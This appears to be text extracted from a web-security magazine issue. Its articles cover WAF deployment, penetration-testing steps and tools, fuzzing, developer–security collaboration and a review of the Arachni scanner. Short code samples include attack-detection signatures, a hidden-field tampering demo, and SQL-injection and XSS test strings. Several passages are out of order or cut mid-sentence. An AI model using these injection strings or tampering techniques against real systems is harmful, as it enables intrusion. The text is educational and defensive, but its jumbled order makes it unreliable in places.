Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser, for example if a web application does not conduct sufficient checks of the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes. As a result, whitelist-only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
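The combined approach can be sketched as a check that first applies a generic blacklist of attack signatures everywhere and then, for designated high-value URLs only, a strict whitelist of known parameters. The URLs, signatures and rules below are illustrative, not from any shipping product:

```python
import re

# Generic negative-security signatures (blacklist), applied everywhere
BLACKLIST = [re.compile(p, re.I) for p in (
    r"<script",             # reflected XSS attempt
    r"\bunion\s+select\b",  # classic SQL injection
    r"\.\./",               # path traversal
)]

# Positive-security profile (whitelist) only for a high-value page
WHITELIST = {"/order": {"item_id": re.compile(r"^\d+$"),
                        "qty":     re.compile(r"^\d{1,3}$")}}

def allow(url, params):
    for value in params.values():
        if any(sig.search(value) for sig in BLACKLIST):
            return False                    # blacklisted pattern anywhere
    profile = WHITELIST.get(url)
    if profile is not None:                 # strict rules for high-value URLs
        if set(params) != set(profile):
            return False
        return all(profile[k].match(v) is not None for k, v in params.items())
    return True                             # other URLs: blacklist only

print(allow("/search", {"q": "red shoes"}))            # True
print(allow("/search", {"q": "<script>alert(1)"}))     # False
print(allow("/order", {"item_id": "42", "qty": "2"}))  # True
```

The template/whitelist split keeps maintenance effort on the pages where tampering would hurt most.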
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that violate the policies but can still be categorized as legitimate based on extensive heuristic analysis. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, in this mode all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is deployed in-line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode. Special functions are only available here: as a Full Reverse Proxy, a WAF provides for example Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult.
own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs must also be configured to correspond with the respective requirements. Penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
Since by its very nature a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. In this context the principle of least privilege applies: users are only awarded privileges on a need-to-have basis for their work or their use of the web application; all other privileges are blocked. A general integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively, are clearly displayed and are easy to understand and to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface which is identical across several of the manufacturer's products, or, even better, a management center which administrators can use to manage numerous other network and security products as well as the WAF. The administrators can then rely on known settings processes for security clusters. This ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in the evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out. If penetration testers are not only looking for a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
WEB APP SECURITY
Figure 3 shows different procedures and steps that can be used to conduct penetration testing. The following are descriptions of these steps:
• Scope and Plan – In this step the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning within the defined scope of the project is conducted: automated scanners examine the open ports and scan the systems to detect vulnerabilities, and the hostnames and IP addresses previously collected are used at this stage.
• Creating Attack Strategies – In this step the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also at this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step the exploitation of vulnerabilities using the automated tools is conducted: the attack methods designed in the previous phase are used to conduct the following tests: data and service pilferage, buffer overflow, privilege escalation and denial of service (if applicable).
• Documentation – In this step all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout pen testing, a specific, structured methodology has to be followed, in which the following steps might be used: Enumeration, Vulnerability Assessment and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools will allow the security team to gather information about the environment, such as open ports, services, versions and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It is also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields and HTML page sources should be part of the security assessment as well.
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access Control
Figure 3. Testing techniques: procedures and steps.
• Authentication and Session Management (Session ID flaws) vulnerabilities
• Cross Site Scripting (XSS) vulnerabilities
• Buffer Overflows
• Injection Flaws
• Error Handling
• Insecure Storage
• Denial of Service (if required)
• Configuration Management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause Denial of Service conditions, which are usually discussed beforehand. Possible options for Denial of Service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing.
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool examines or questions each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. Configuration flexibility in port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
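The TCP connect() scan such tools perform can be sketched in a few lines. To keep the example self-contained, it starts its own local listener and then detects it; a tester would normally supply target hosts and port ranges instead:

```python
import socket

def scan_ports(host, ports, timeout=0.2):
    """Return the subset of `ports` on `host` that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connect succeeded
                open_ports.append(port)
    return open_ports

# Self-contained demo: open a listening socket on an ephemeral local port
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))
listener.listen(1)
demo_port = listener.getsockname()[1]

found = scan_ports("127.0.0.1", [demo_port])
print(found == [demo_port])  # the scanner detects the listening port
listener.close()
```

Real scanners add UDP probes, banner grabbing and stealth techniques on top of this basic loop.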
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most of the commercial and open source scanners scan the operating system for known weaknesses and unpatched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard or Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the weaknesses of the application and its associated components. For example, penetration testers can view all cookies, hidden HTML fields and other data used by the web application, and attempt to manipulate their values to trick the application.
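What an assessment proxy does to a hidden field can be sketched offline: parse the intercepted HTML form, rewrite the hidden value, and re-encode the submission. The form and field names below are made up for illustration:

```python
from html.parser import HTMLParser
from urllib.parse import urlencode

class HiddenFieldCollector(HTMLParser):
    """Collect name/value pairs of <input type="hidden"> fields."""
    def __init__(self):
        super().__init__()
        self.fields = {}
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name")] = a.get("value")

# Intercepted response from the target application (illustrative)
page = '''<form action="/buy" method="post">
  <input type="hidden" name="item" value="book">
  <input type="hidden" name="price" value="100">
  <input type="submit" value="Buy">
</form>'''

parser = HiddenFieldCollector()
parser.feed(page)
tampered = dict(parser.fields, price="1")  # the proxy rewrites the value
body = urlencode(tampered)                 # re-encoded request body
print(body)  # item=book&price=1
```

If the application accepts the tampered body, it trusted client-side state it should have validated on the server, which is exactly the Hidden Field Tampering weakness listed earlier.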
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, in which traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform the penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used for feedback and for reporting the test results.
• Extensibility – The tool can be customized, and it must provide scripting language or plug-in
capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide proper documentation giving a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that can be used without specific constraints, such as a particular IP range or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data that is sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to cleanse incoming data of unwanted content, it might lead to vulnerabilities such as SQL injection, cross site scripting and other attacks against the web application.
• Validate data before form submission and manage sessions – To avoid Cross Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying that it came from the user's own web form, it is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect any stored passwords.
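A minimal Ruby sketch of the first two techniques above (input sanitization and CSRF-token verification). All helper names here are hypothetical illustrations; a real application would rely on its framework's built-in facilities rather than hand-rolled helpers.

```ruby
require "erb"
require "securerandom"

# --- Sanitizing browser-supplied data (illustrative only) ---

# Escape anything that will be echoed back into HTML.
def sanitize_for_html(input)
  ERB::Util.html_escape(input)
end

# Hypothetical whitelist check for a username field.
def valid_username?(input)
  !!(input =~ /\A[a-zA-Z0-9_]{3,20}\z/)
end

# --- Verifying that a form came from us (CSRF token) ---

def issue_csrf_token(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

def valid_csrf_token?(session, submitted)
  expected = session[:csrf_token].to_s
  return false if expected.empty?
  submitted = submitted.to_s
  return false unless submitted.bytesize == expected.bytesize
  # constant-time comparison: XOR every byte pair and check the sum
  expected.bytes.zip(submitted.bytes).map { |a, b| a ^ b }.sum.zero?
end

session = {}
token = issue_csrf_token(session)
puts sanitize_for_html("<script>alert(1)</script>")  # markup is neutralised
puts valid_username?("bob_42")                       # true
puts valid_csrf_token?(session, token)               # true
puts valid_csrf_token?(session, "forged")            # false
```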
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system; it determines whether there are weaknesses or vulnerabilities in the system under assessment. Penetration testing includes all of the processes in a vulnerability assessment plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-forcing detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will continue over time to reduce both the uncertainty of determination (i.e. false positives) and the potential to miss some issues (i.e. false negatives).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools cannot entirely replace manual penetration testing. However, if the automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results with the logical vulnerabilities that automated testing misses.
Finally, it is important to point out that over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the use of automated tools rather than manual human testing of these applications. Relying on human effort to test for thousands of technical vulnerabilities within these applications is also subject to human error and simply cannot be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
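The core loop described above can be sketched in a few lines of Ruby. This is a toy harness against a stand-in target (a JSON parser), not a production fuzzer; a real harness would drive an external program or service and monitor it for crashes.

```ruby
require "json"

# A handful of anomalous inputs: empty, NUL byte, deeply nested,
# invalid encoding, and oversized.
ANOMALIES = ["", "\x00", "{" * 10_000, "\xff\xfe", "9" * 4096]

def fuzz(anomalies)
  findings = []
  anomalies.each do |input|
    begin
      JSON.parse(input)            # stand-in target: a JSON parser
    rescue JSON::ParserError
      # a clean, expected rejection of bad input is not a finding
    rescue StandardError => e
      # any other failure mode is the "abnormal reaction" we look for
      findings << [input[0, 16].inspect, e.class]
    end
  end
  findings
end

p fuzz(ANOMALIES)
```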
In this article, we will highlight the most important requirements of a fuzzing tool and also look at the most common mistakes people make with fuzzing.
Documented test cases
When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation
All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts
Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box
If the requirement for testers is to do fuzzing, they almost always choose the quick-and-dirty solution. This is almost always random fuzzing. Test requirements should instead focus on coverage metrics to ensure that testing aims to find most flaws in the software.
Using hardware test beds
Appliance-based fuzzing tools become outdated really fast, and the hardware speed requirements increase each year. Software-based fuzzers are scalable in performance, can easily travel with you to wherever testing is needed, and are not locked to a physical test lab.
Unprepared for the cloud
A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to the cloud.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites
Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
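The difference between random and model-derived cases can be illustrated with a toy sketch. The "model" here is deliberately simplified to a list of boundary-targeting anomalies for a hypothetical field with a specified maximum length; a real model-based fuzzer derives such cases from a full protocol specification.

```ruby
# Random fuzzing: arbitrary byte strings, most of which exercise
# nothing interesting in the target.
def random_cases(n)
  Array.new(n) { (0...rand(1..64)).map { rand(256).chr }.join }
end

# Model-based fuzzing (toy version): anomalies aimed at the field's
# specified limits and known dangerous token classes.
def model_based_cases(field_max_len)
  [
    "",                           # empty value
    "A" * field_max_len,          # exactly at the limit
    "A" * (field_max_len + 1),    # one past the limit
    "A" * (field_max_len * 100),  # grossly oversized
    "%s%n%x",                     # format-string tokens
    "\x00value",                  # embedded NUL byte
  ]
end

puts model_based_cases(32).length  # a small set of targeted anomalies
```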
Easy to use
Most fuzzers are built for security experts, but in QA you cannot expect all testers to understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated
Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression-testing and bug-reporting frameworks.
Test coverage
Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable
Time is almost always an issue when it comes to testing, and the user must have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time on testing and can select other test-completion criteria.
Application Security team members are regarded like the tax man asking for money: security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.

Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario. The Marketing department has asked for a brand-new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers for something like Give us the latest Web 2.0, social-enabled website, or something like that to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.

The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment, when someone recalls something about security: Hey, we need to get this online! So we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom. For example, the report might state a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before use. The report does not contain all
Developers are from Venus, Application Security guys from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not open source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded in a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filter policy recommendation into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach. The security team and the application developers are now on the same page, and everyone is happy.

There is a third approach, which I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward: using the WAPT activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code should deal with malformed input. Then the development team corrects the code until it passes all of the test cases; when testing is complete and all tests pass, your source code has implemented the filtering policy.

How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input and why it is so important to the Application Security group.
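To make the idea concrete, here is a BDD-flavoured scenario sketched with Ruby's bundled Minitest spec syntax standing in for rspec/cucumber. The `sanitize_param` filter is a hypothetical (and deliberately crude) stand-in for the code the development team must make pass.

```ruby
require "minitest/autorun"

# Hypothetical filtering routine under test: the finding "parameter is
# not sanitized before use" becomes an executable scenario that fails
# until the developers implement a real filter.
def sanitize_param(value)
  value.to_s.gsub(/['";<>]/, "")  # strawman filter, for illustration only
end

describe "product search parameter" do
  it "strips SQL metacharacters from malformed input" do
    _(sanitize_param("shoes'; DROP TABLE users;--")).wont_include "'"
  end

  it "leaves well-formed input untouched" do
    _(sanitize_param("running shoes")).must_equal "running shoes"
  end
end
```

When all scenarios pass, the "implement a filtering policy" remediation statement has, by construction, been implemented.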
In the next article, we will see how to write some security tests using the BDD approach in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are postponed or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a non-common-ground language that confuses or annoys everyone and pushes the groups further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developers' point of view, because they do not give specific information that pinpoints where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
Reading the security issues found in penetration testing is not for the faint of heart. There can be a lot of high-level security issues, grouped by the OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:
• Creating a development framework that has security built into it
• Designing an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community, there are a lot of non-standardized frameworks available for Java developers.
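What "inheriting security from the framework" means can be sketched in a few lines. This is an illustration in plain Ruby, in the spirit of Rails' escaping helpers, not actual Rails code; the helper and class names are hypothetical.

```ruby
require "erb"

# A hypothetical view helper that HTML-escapes by default, so the
# developer gets XSS protection without having to think about it.
module SafeHelpers
  def render_field(label, value)
    "<p>#{ERB::Util.html_escape(label)}: #{ERB::Util.html_escape(value)}</p>"
  end
end

class ProductView
  include SafeHelpers
end

# Hostile input is neutralised by the framework-level helper, not by
# ad-hoc per-call-site code.
puts ProductView.new.render_field("Review", "<img src=x onerror=alert(1)>")
```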
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practising the Tae kwon-do ITF martial art. He's a husband and a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset, and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?

Time for an in-depth review.
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1. Overview of audit and reconnaissance modules included with Arachni
Audit modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).

This is great if you want to speed up the scan, or if you want to do some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler tries to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML, thanks to a combination of regular-expression analysis and the Nokogiri HTML parser.
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.
• Passive Proxy – Analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit.
• Form-based AutoLogin – Performs an automated login.
• Dictionary attacker – Performs dictionary attacks against HTTP authentication and form-based authentication.
• Profiler – Performs taint analysis with benign inputs and response-time analysis.
• Cookie collector – Keeps track of cookies while establishing a timeline of the changes.
• Healthmap – Generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL.
• Content-types – Logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files.
